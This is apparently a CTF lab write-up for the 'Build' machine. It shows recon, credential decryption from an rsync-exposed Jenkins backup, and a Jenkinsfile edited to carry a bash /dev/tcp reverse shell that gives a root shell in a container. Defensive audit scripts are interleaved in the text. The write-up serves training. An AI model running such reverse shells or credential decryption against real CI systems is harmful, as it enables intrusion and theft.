Build

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# nmap 10.129.234.169 -p 22,53,512,514,513,873,3000 -sCV -O -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-02 12:06 EST
Nmap scan report for 10.129.234.169
Host is up (0.083s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 47:21:73:e2:6b:96:cd:f9:13:11:af:40:c8:4d:d6:7f (ECDSA)
|_  256 2b:5e:ba:f3:72:d3:b3:09:df:25:41:29:09:f4:7b:f5 (ED25519)
53/tcp   open  domain  PowerDNS
| dns-nsid:
|   NSID: pdns (70646e73)
|_  id.server: pdns
512/tcp  open  exec    netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell   Netkit rshd
873/tcp  open  rsync   (protocol version 31)
3000/tcp open  http    Golang net/http server
|_http-title: Gitea: Git with a cup of tea
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=250c127e9b495720; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=tzE5lvQZzgB8XEKi65WWDb5YcEw6MTc2NzM3MzU3NjI2MzE5NzIyNA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 02 Jan 2026 17:06:16 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Gitea: Git with a cup of tea</title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9idWlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=40d7a5432563f6b8; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=cnMdAPP-IvCF9DDQ-ckNzgWNRTM6MTc2NzM3MzU3NjYzODgwMjQwMg; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 02 Jan 2026 17:06:16 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=1/2%Time=6957FB08%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,2546,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\
SF:x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nSet-Cookie:\x20i_like_gitea=2
SF:50c127e9b495720;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nSet-Cookie:
SF:\x20_csrf=tzE5lvQZzgB8XEKi65WWDb5YcEw6MTc2NzM3MzU3NjI2MzE5NzIyNA;\x20Pa
SF:th=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSite=Lax\r\nX-Frame-Options
SF::\x20SAMEORIGIN\r\nDate:\x20Fri,\x2002\x20Jan\x202026\x2017:06:16\x20GM
SF:T\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-a
SF:uto\">\n<head>\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-
SF:width,\x20initial-scale=1\">\n\t<title>Gitea:\x20Git\x20with\x20a\x20cu
SF:p\x20of\x20tea</title>\n\t<link\x20rel=\"manifest\"\x20href=\"data:appl
SF:ication/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSI
SF:sInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdX
SF:JsIjoiaHR0cDovL2J1aWxkLnZsOjMwMDAvIiwiaWNvbnMiOlt7InNyYyI6Imh0dHA6Ly9id
SF:WlsZC52bDozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwi
SF:c2l6ZXMiOiI1MTJ")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(HTTPOptions,197,"HTTP/1\.0\x20405\x20Method
SF:\x20Not\x20Allowed\r\nAllow:\x20HEAD\r\nAllow:\x20GET\r\nCache-Control:
SF:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nSet-C
SF:ookie:\x20i_like_gitea=40d7a5432563f6b8;\x20Path=/;\x20HttpOnly;\x20Sam
SF:eSite=Lax\r\nSet-Cookie:\x20_csrf=cnMdAPP-IvCF9DDQ-ckNzgWNRTM6MTc2NzM3M
SF:zU3NjYzODgwMjQwMg;\x20Path=/;\x20Max-Age=86400;\x20HttpOnly;\x20SameSit
SF:e=Lax\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x2002\x20Jan\x
SF:202026\x2017:06:16\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReque
SF:st,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.64 seconds

1.2. Gitea

Gitea hosts one public repository, and it contains a single file, a Jenkinsfile:

pipeline {
    agent any

    stages {
        stage('Do nothing') {
            steps {
                sh '/bin/true'
            }
        }
    }
}

The Gitea version is 1.21.11, a relatively old release.

┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# dirsearch -u http://10.129.234.169:3000/ -x 403,404

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Build/reports/http_10.129.234.169_3000/__26-01-02_12-13-22.txt

Target: http://10.129.234.169:3000/

[12:13:22] Starting:
[12:13:29] 200 -  206B  - /.well-known/security.txt
[12:13:29] 200 -    1KB - /.well-known/openid-configuration
[12:13:29] 200 -   16KB - /123
[12:13:32] 303 -   38B  - /admin  ->  /user/login
[12:13:34] 303 -   38B  - /admin/  ->  /user/login
[12:13:39] 200 -  706B  - /api/swagger
[12:13:50] 303 -   41B  - /explore  ->  /explore/repos
[12:13:51] 200 -   15KB - /explore/repos
[12:13:51] 301 -   58B  - /favicon.ico  ->  /assets/img/favicon.png
[12:13:55] 303 -   38B  - /issues  ->  /user/login
[12:14:13] 200 -  277B  - /sitemap.xml
[12:14:19] 200 -   11KB - /user/login/
[12:14:19] 401 -   50B  - /v2
[12:14:19] 401 -   50B  - /v2/
[12:14:19] 401 -   50B  - /v2/_catalog

Task Completed

Nothing special here; these are all the standard Gitea paths.

1.3. rsync

# list the shared modules
┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# rsync -av --list-only rsync://10.129.234.169:873
backups         backups

# copy them to the local machine
┌──(root㉿kali)-[~/Desktop/htb/Build/backups]
└─# rsync -avP rsync://10.129.234.169:873/backups/ ./backups
receiving incremental file list
./
jenkins.tar.gz
     20,021,248   5%  830.04kB/s    0:07:09  rsync: [receiver] write error: Broken pipe (32)
rsync error: received SIGINT, SIGTERM, or SIGHUP (code 20) at io.c(1701) [sender=3.2.7]
    376,289,280 100%    1.14MB/s    0:05:15 (xfr#1, to-chk=0/2)

sent 50 bytes  received 376,381,276 bytes  1,185,452.00 bytes/sec
total size is 376,289,280  speedup is 1.00

This backup file is very large, so be patient while it downloads.

1.4. Jenkins credential decryption

┌──(root㉿kali)-[~/…/Build/backups/backups/jenkins_configuration]
└─# cat /root/Desktop/htb/Build/backups/backups/jenkins_configuration/jobs/build/config.xml
<?xml version='1.1' encoding='UTF-8'?>
<jenkins.branch.OrganizationFolder plugin="branch-api@2.1163.va_f1064e4a_a_f3">
  <actions/>
  <description>dev</description>
  <displayName>dev</displayName>
  <properties>
    <jenkins.branch.OrganizationChildHealthMetricsProperty>
      <templates>
        <com.cloudbees.hudson.plugins.folder.health.WorstChildHealthMetric plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
          <nonRecursive>false</nonRecursive>
        </com.cloudbees.hudson.plugins.folder.health.WorstChildHealthMetric>
      </templates>
    </jenkins.branch.OrganizationChildHealthMetricsProperty>
    <jenkins.branch.OrganizationChildOrphanedItemsProperty>
      <strategy class="jenkins.branch.OrganizationChildOrphanedItemsProperty$Inherit"/>
    </jenkins.branch.OrganizationChildOrphanedItemsProperty>
    <jenkins.branch.OrganizationChildTriggersProperty>
      <templates>
        <com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
          <spec>H H/4 * * *</spec>
          <interval>86400000</interval>
        </com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
      </templates>
    </jenkins.branch.OrganizationChildTriggersProperty>
    <com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <com.cloudbees.plugins.credentials.domains.Domain plugin="credentials@1337.v60b_d7b_c7b_c9f">
            <specifications/>
          </com.cloudbees.plugins.credentials.domains.Domain>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl plugin="credentials@1337.v60b_d7b_c7b_c9f">
              <id>e4048737-7acd-46fd-86ef-a3db45683d4f</id>
              <description></description>
>>>>               <username>buildadm</username>
>>>>               <password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
              <usernameSecret>false</usernameSecret>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty>
    <jenkins.branch.NoTriggerOrganizationFolderProperty>
      <branches>.*</branches>
      <strategy>NONE</strategy>
    </jenkins.branch.NoTriggerOrganizationFolderProperty>
  </properties>
  <folderViews class="jenkins.branch.OrganizationFolderViewHolder">
    <owner reference="../.."/>
  </folderViews>
  <healthMetrics/>
  <icon class="jenkins.branch.MetadataActionFolderIcon">
    <owner class="jenkins.branch.OrganizationFolder" reference="../.."/>
  </icon>
  <orphanedItemStrategy class="com.cloudbees.hudson.plugins.folder.computed.DefaultOrphanedItemStrategy" plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
    <pruneDeadBranches>true</pruneDeadBranches>
    <daysToKeep>-1</daysToKeep>
    <numToKeep>-1</numToKeep>
    <abortBuilds>false</abortBuilds>
  </orphanedItemStrategy>
  <triggers>
    <com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger plugin="cloudbees-folder@6.901.vb_4c7a_da_75da_3">
      <spec>* * * * *</spec>
      <interval>60000</interval>
    </com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
  </triggers>
  <disabled>false</disabled>
  <navigators>
    <org.jenkinsci.plugin.gitea.GiteaSCMNavigator plugin="gitea@1.4.7">
      <serverUrl>http://172.18.0.2:3000</serverUrl>
      <repoOwner>buildadm</repoOwner>
      <credentialsId>e4048737-7acd-46fd-86ef-a3db45683d4f</credentialsId>
      <traits>
        <org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
          <strategyId>1</strategyId>
        </org.jenkinsci.plugin.gitea.BranchDiscoveryTrait>
        <org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
          <strategyId>1</strategyId>
        </org.jenkinsci.plugin.gitea.OriginPullRequestDiscoveryTrait>
        <org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
          <strategyId>1</strategyId>
          <trust class="org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait$TrustContributors"/>
        </org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
      </traits>
    </org.jenkinsci.plugin.gitea.GiteaSCMNavigator>
  </navigators>
  <projectFactories>
    <org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory plugin="workflow-multibranch@773.vc4fe1378f1d5">
      <scriptPath>Jenkinsfile</scriptPath>
    </org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory>
  </projectFactories>
  <buildStrategies/>
  <strategy class="jenkins.branch.DefaultBranchPropertyStrategy">
    <properties class="empty-list"/>
  </strategy>
</jenkins.branch.OrganizationFolder>

Inside it is the encrypted password of the buildadm user. This is a Jenkins-encrypted secret, so you need jenkins-credentials-decryptor to decrypt it:

wget https://github.com/hoto/jenkins-credentials-decryptor/releases/download/1.2.2/jenkins-credentials-decryptor_1.2.2_Linux_x86_64

Jenkins stores encrypted credentials in the credentials.xml file or in config.xml files. To decrypt them you need the master.key and hudson.util.Secret files.

All of these files are located in the Jenkins home directory:

$JENKINS_HOME/credentials.xml
$JENKINS_HOME/secrets/master.key
$JENKINS_HOME/secrets/hudson.util.Secret
$JENKINS_HOME/jobs/example-folder/config.xml - Possible location

┌──(root㉿kali)-[~/…/htb/Build/backups/backups]
└─# ./jenkins-credentials-decryptor -m jenkins_configuration/secrets/master.key -s jenkins_configuration/secrets/hudson.util.Secret -c jenkins_configuration/jobs/build/config.xml -o json
[
  {
    "id": "e4048737-7acd-46fd-86ef-a3db45683d4f",
    "password": "Git1234!",
    "username": "buildadm"
  }
]

That gives us the username and password.
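The reason the decryption above works at all is that the rsync share handed out the encrypted credential and both key files in one archive. The following Python is an added example (not from the write-up and not part of jenkins-credentials-decryptor) that audits an exported Jenkins home for exactly that combination, so a defender can check what a backup leaks before it is copied anywhere. The sample directory tree is constructed inside the script; only the encrypted password value is copied from the config.xml above, and the key-file contents are placeholders.

```python
"""Check whether an exported Jenkins home (such as a backup pulled from a
file share) contains both encrypted credentials and the key material that
decrypts them.  Added example: not from the write-up and not part of
jenkins-credentials-decryptor.  The sample tree is constructed here; only
the encrypted password value is copied from the config.xml above."""
import re
import tempfile
from pathlib import Path

# Files Jenkins needs to unwrap its own secrets (relative to $JENKINS_HOME).
KEY_FILES = ("secrets/master.key", "secrets/hudson.util.Secret")
# Files that routinely carry encrypted credential values.
XML_NAMES = ("config.xml", "credentials.xml")
# Jenkins writes encrypted values as base64 inside braces, e.g. <password>{AQAA...}</password>.
ENC_ELEMENT = re.compile(r"<(\w+)>\s*(\{[A-Za-z0-9+/=]+\})\s*</\1>")


def find_encrypted_values(xml_text):
    """Return [(element_name, encrypted_blob), ...] for every braced secret."""
    return [(m.group(1), m.group(2)) for m in ENC_ELEMENT.finditer(xml_text)]


def audit_jenkins_home(root):
    """Report which XML files hold secrets and whether the keys that open them
    travelled along with the backup."""
    root = Path(root)
    keys_present = all((root / k).is_file() for k in KEY_FILES)
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name not in XML_NAMES:
            continue
        vals = find_encrypted_values(path.read_text(errors="replace"))
        if vals:
            findings.append({"file": path.relative_to(root).as_posix(),
                             "fields": [name for name, _ in vals]})
    return {
        "keys_present": keys_present,
        "encrypted_files": findings,
        # The dangerous combination: secrets plus the keys, in one archive.
        "decryptable": keys_present and bool(findings),
    }


def build_sample_tree(with_keys=True):
    """Constructed sample mirroring the jenkins_configuration/ layout."""
    d = Path(tempfile.mkdtemp())
    (d / "secrets").mkdir()
    if with_keys:
        # Placeholder contents; real files are random bytes written by Jenkins.
        (d / "secrets" / "master.key").write_text("PLACEHOLDER-MASTER-KEY")
        (d / "secrets" / "hudson.util.Secret").write_bytes(b"PLACEHOLDER-SECRET")
    (d / "jobs" / "build").mkdir(parents=True)
    (d / "jobs" / "build" / "config.xml").write_text(
        "<folder><username>buildadm</username>"
        "<password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password></folder>")
    (d / "config.xml").write_text("<hudson><useSecurity>true</useSecurity></hudson>")
    return d


if __name__ == "__main__":
    print(audit_jenkins_home(build_sample_tree()))
```

Pointing `audit_jenkins_home` at the real `backups/jenkins_configuration` directory from the rsync share reports `decryptable: True`, which is the condition that should fail a backup-hygiene check: `secrets/` belongs in a separately protected store, not next to the job configs it unlocks.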

Trying to log in over SSH with it fails, but it does work for Gitea.

Now I can control the contents of this Jenkinsfile. It is a pipeline definition, so I think that as soon as I update it, it will be executed.

pipeline {
    agent any

    stages {
        stage('Do nothing') {
            steps {
                sh 'bash -c "bash -i >& /dev/tcp/10.10.14.79/5566 0>&1"'
            }
        }
    }
}

I changed it to the above.
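The config.xml recovered in section 1.4 explains why a pushed Jenkinsfile is enough: the Organization Folder rescans every minute, takes the pipeline script from the repository, stores the buildadm credential inside the folder itself, and trusts contributors' fork pull requests. The following Python is an added example (not the write-up's or Jenkins' own tooling) that pulls those settings out of such a config.xml and states the resulting exposure in plain language. SAMPLE_CONFIG is an abridged copy of the file shown above with the XML declaration dropped; a reviewer would run `audit_org_folder` over the real file.

```python
"""Audit a Jenkins Organization Folder config.xml for settings that turn
repository write access into code execution on the build node.  Added
example based on the config.xml recovered from the backup; not part of the
write-up or of Jenkins.  SAMPLE_CONFIG is an abridged copy of that file."""
import xml.etree.ElementTree as ET

SAMPLE_CONFIG = """<jenkins.branch.OrganizationFolder plugin="branch-api@2.1163.va_f1064e4a_a_f3">
  <properties>
    <com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty>
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
              <id>e4048737-7acd-46fd-86ef-a3db45683d4f</id>
              <username>buildadm</username>
              <password>{AQAAABAAAAAQUNBJaKiUQNaRbPI0/VMwB1cmhU/EHt0chpFEMRLZ9v0=}</password>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.hudson.plugins.folder.properties.FolderCredentialsProvider_-FolderCredentialsProperty>
  </properties>
  <triggers>
    <com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
      <spec>* * * * *</spec>
      <interval>60000</interval>
    </com.cloudbees.hudson.plugins.folder.computed.PeriodicFolderTrigger>
  </triggers>
  <navigators>
    <org.jenkinsci.plugin.gitea.GiteaSCMNavigator plugin="gitea@1.4.7">
      <serverUrl>http://172.18.0.2:3000</serverUrl>
      <repoOwner>buildadm</repoOwner>
      <credentialsId>e4048737-7acd-46fd-86ef-a3db45683d4f</credentialsId>
      <traits>
        <org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
          <strategyId>1</strategyId>
          <trust class="org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait$TrustContributors"/>
        </org.jenkinsci.plugin.gitea.ForkPullRequestDiscoveryTrait>
      </traits>
    </org.jenkinsci.plugin.gitea.GiteaSCMNavigator>
  </navigators>
  <projectFactories>
    <org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory>
      <scriptPath>Jenkinsfile</scriptPath>
    </org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProjectFactory>
  </projectFactories>
</jenkins.branch.OrganizationFolder>
"""


def audit_org_folder(xml_text):
    """Extract the settings that matter and derive the risks they imply."""
    root = ET.fromstring(xml_text)
    interval_ms = root.findtext("triggers/*/interval")
    report = {
        # How often the folder rescans its repositories for changes.
        "rescan_spec": root.findtext("triggers/*/spec"),
        "rescan_interval_s": int(interval_ms) // 1000 if interval_ms else None,
        # Credentials stored inside the folder config (they travel with any backup).
        "embedded_credentials": [(c.findtext("id"), c.findtext("username"))
                                 for c in root.iter()
                                 if c.tag.endswith("UsernamePasswordCredentialsImpl")],
        # Who may supply pipeline code from forked pull requests.
        "fork_pr_trust": [t.get("class") for t in root.iter("trust")],
        # Pipeline definition read straight from the repository.
        "script_path": root.findtext("projectFactories/*/scriptPath"),
    }
    risks = []
    if report["rescan_interval_s"] is not None and report["rescan_interval_s"] <= 60:
        risks.append("folder rescans every minute, so repository changes are picked up quickly")
    if report["embedded_credentials"]:
        risks.append("username/password credential stored in the folder config; "
                     "a copy of this file plus secrets/ reveals it")
    if any(t.endswith("$TrustContributors") for t in report["fork_pr_trust"]):
        risks.append("fork pull requests from contributors are trusted to supply the Jenkinsfile")
    if report["script_path"]:
        risks.append("pipeline script '%s' is read from the repo, so repository write access "
                     "equals code execution on the build node" % report["script_path"])
    report["risks"] = risks
    return report


if __name__ == "__main__":
    for line in audit_org_folder(SAMPLE_CONFIG)["risks"]:
        print("-", line)
```

Combined with the earlier observation that the build node runs as root inside the Jenkins container, each of these four findings is a separate hardening item: a less trusting fork policy, credentials kept in a dedicated store rather than the folder, and a build agent that is not the controller itself.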

After waiting a short while, the shell comes in:

┌──(root㉿kali)-[~/Desktop/htb/Build]
└─# penelope -p 5566
[+] Listening for reverse shells on 0.0.0.0:5566 →  127.0.0.1 • 192.168.8.18 • 172.19.0.1 • 172.17.0.1 • 10.10.14.79
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 5ac6c7d6fb8e~10.129.3.222-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one Raw session to handle the PTY
[+] Attempting to spawn a reverse shell on 10.10.14.79:5566
[+] Got reverse shell from 5ac6c7d6fb8e~10.129.3.222-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /root/.penelope/sessions/5ac6c7d6fb8e~10.129.3.222-Linux-x86_64/2026_01_03-00_00_24-470.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────
[+] Shell upgraded successfully using /usr/bin/script! 💪
[+] Got reverse shell from 5ac6c7d6fb8e~10.129.3.222-Linux-x86_64 😍️ Assigned SessionID <3>

root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# whoami
root
root@5ac6c7d6fb8e:/var/jenkins_home/workspace/build_dev_main# df -h
Filesystem                         Size  Used Avail Use% Mounted on
overlay                            9.8G  6.2G  3.5G  65% /
tmpfs                               64M     0   64M   0% /dev
shm                                 64M     0   64M   0% /dev/shm
/dev/mapper/ubuntu--vg-ubuntu--lv  9.8G  6.2G  3.5G  65% /root
tmpfs                              2.0G     0  2.0G   0% /proc/acpi
tmpfs                              2.0G     0  2.0G   0% /proc/scsi
tmpfs                              2.0G     0  2.0G   0% /sys/firmware

Clearly this is a Docker container.

root@5ac6c7d6fb8e:~# cat user.txt
466098e1d44521703f270f93699c40f7

It is an unprivileged container:

root@5ac6c7d6fb8e:~# cat /proc/self/status | grep CapEff
CapEff: 00000000a80425fb
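The CapEff value above is what supports the "unprivileged" verdict, but only once it is decoded. The following Python is an added example (not from the write-up or from CDK) that turns the mask into capability names, compares it with Docker's default capability set and flags capabilities that usually weaken container isolation. The status text is constructed from the values shown above; the bit numbers follow the kernel's capability.h.

```python
"""Decode the CapEff bitmask from /proc/<pid>/status and compare it with the
Docker default capability set.  Added example, not from the write-up or from
CDK; SAMPLE_STATUS is constructed from the values shown above."""

# Bit positions as defined in include/uapi/linux/capability.h.
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# The capability set Docker grants a container by default (no --cap-add).
DOCKER_DEFAULT = {
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL",
    "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
    "CAP_NET_RAW", "CAP_SYS_CHROOT", "CAP_MKNOD", "CAP_AUDIT_WRITE", "CAP_SETFCAP",
}

# Capabilities whose presence in a container commonly undermines isolation.
HIGH_RISK = {"CAP_SYS_ADMIN", "CAP_SYS_PTRACE", "CAP_SYS_MODULE", "CAP_SYS_RAWIO",
             "CAP_DAC_READ_SEARCH", "CAP_NET_ADMIN", "CAP_BPF", "CAP_PERFMON"}


def decode_caps(hex_mask):
    """Map a hex capability mask (as printed in /proc/*/status) to names."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def parse_status(status_text):
    """Pick the Cap* lines out of a /proc/<pid>/status dump."""
    caps = {}
    for line in status_text.splitlines():
        if line.startswith("Cap"):
            key, _, value = line.partition(":")
            caps[key.strip()] = value.strip()
    return caps


def assess_container(status_text):
    """Compare the effective set with Docker's default and flag the excess."""
    eff = set(decode_caps(parse_status(status_text)["CapEff"]))
    order = CAP_NAMES.index
    return {
        "effective": sorted(eff, key=order),
        "extra_vs_docker_default": sorted(eff - DOCKER_DEFAULT, key=order),
        "high_risk": sorted(eff & HIGH_RISK, key=order),
        # Every known capability present is what --privileged looks like.
        "looks_privileged": eff >= set(CAP_NAMES),
    }


# Constructed from the CapEff/CapPrm/CapBnd values shown above.
SAMPLE_STATUS = """Name:\tbash
Uid:\t0\t0\t0\t0
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""

if __name__ == "__main__":
    print(assess_container(SAMPLE_STATUS))
```

For the mask on this host the script returns an empty `extra_vs_docker_default` and `high_risk` list, which is the concrete basis for calling the container unprivileged; a mask such as `000001ffffffffff` would instead report every capability and `looks_privileged: True`.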

2. Root

2.1. Information gathering

In root's home directory there are two domain names (in .rhosts) and a private key:

root@5ac6c7d6fb8e:~# ls -la
total 20
drwxr-xr-x 3 root root 4096 May  2  2024 .
drwxr-xr-x 1 root root 4096 May  9  2024 ..
lrwxrwxrwx 1 root root    9 May  1  2024 .bash_history -> /dev/null
-r-------- 1 root root   35 May  1  2024 .rhosts
drwxr-xr-x 2 root root 4096 May  1  2024 .ssh
-rw------- 1 root root   33 Apr 15  2025 user.txt
root@5ac6c7d6fb8e:~# cat .rhosts
admin.build.vl +
intern.build.vl +
root@5ac6c7d6fb8e:~# cd .ssh/
root@5ac6c7d6fb8e:~/.ssh# ls
authorized_keys  id_ed25519  id_ed25519.pub  known_hosts
root@5ac6c7d6fb8e:~/.ssh# cat id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
